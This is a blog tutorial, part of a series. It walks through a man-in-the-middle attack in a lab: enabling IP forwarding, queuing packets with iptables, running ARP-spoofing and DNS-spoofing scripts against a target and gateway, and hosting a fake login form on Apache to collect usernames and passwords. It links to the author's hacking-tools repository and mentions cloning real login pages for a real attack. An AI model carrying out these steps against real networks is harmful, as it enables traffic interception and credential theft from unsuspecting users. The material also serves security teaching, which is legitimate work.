DNS spoofing by example — Part 6

Maksym Postument
Sep 4, 2018 · 3 min read

Hello friends, today we are going to try previously created arp-spoofing and dns_spoofing to perform an attack on the target.

My environment contains KaliLinux VM(Hacker) and Windows 10(Target).

As usually to perform man in the middle we need to use arp spoofer, this allows us to receive all target packets.

First what needs to be done is to enable port forwarding. Execute this command on your Linux VM:

echo 1 > /proc/sys/net/ipv4/ip_forward

Also, Net Filter Queue should be created. This will allow to catch and edit packets before sending it to target:

iptables -I FORWARD -j NFQUEUE --queue-num 0

Let’s check ARP table before execution of apr spoofer:

Let’s execute arp spoofer can be executed:

python arp_spoofing.py -t 10.0.2.4 -g 10.0.2.1
[+] Packets sent: 4^

Where -t 10.0.2.4 — Target IP address and -g 10.0.2.1 — gateway IP address.

And check ARP table one more time:

Gateway mac address was replaced with hacker mac address. And now hacker will receive all target packets.

To finish attack web server should be installed on KaliLinux and should contain a clone of website credentials to which we are going to steal. Kali Linux has built-in tools to make a clone of the login page to any website. But this a topic for another post. Currently, I am going to use a just a simple page with apache server to demonstrate how the attack works.

Start apache server and add simple html page to it

systemctl start apache2

Add some content in /var/www/html/index.html. In a real attack, you will need to have a real copy of a website. I am going to use simple form:

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>devopslife.xyz</title>
</head>
<body>
<h1>This is real devopslife.xyz. Please enter your credentials. No one will get them</h1>
<form action="">
Username:<br>
<input type="text" name="Username">
<br>
Password:<br>
<input type="text" name="Password">
<br><br>
<input type="submit" value="Give credentials to hacker">
</form>
</body>
</html>

Let’s start dns spoofer:

python dns_spoof.py -w devopslife.xyz -i 10.0.2.15

After execution of this script if the target will try to open devopslife.xyz request will be forwarded to hacker IP 10.0.2.15. If login page looks the same as original devopslife.xyz page it hard to identify that someone is trying to hack you. Our page looks different, so it’s no hard to identify that something wrong.

Let’s verify the result of an attack on target VM. Open devopslife.xyz in a browser

Code can be found on my Github — https://github.com/Infectsoldier/hacking_tools

Check my blog — http://www.devopslife.xyz

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade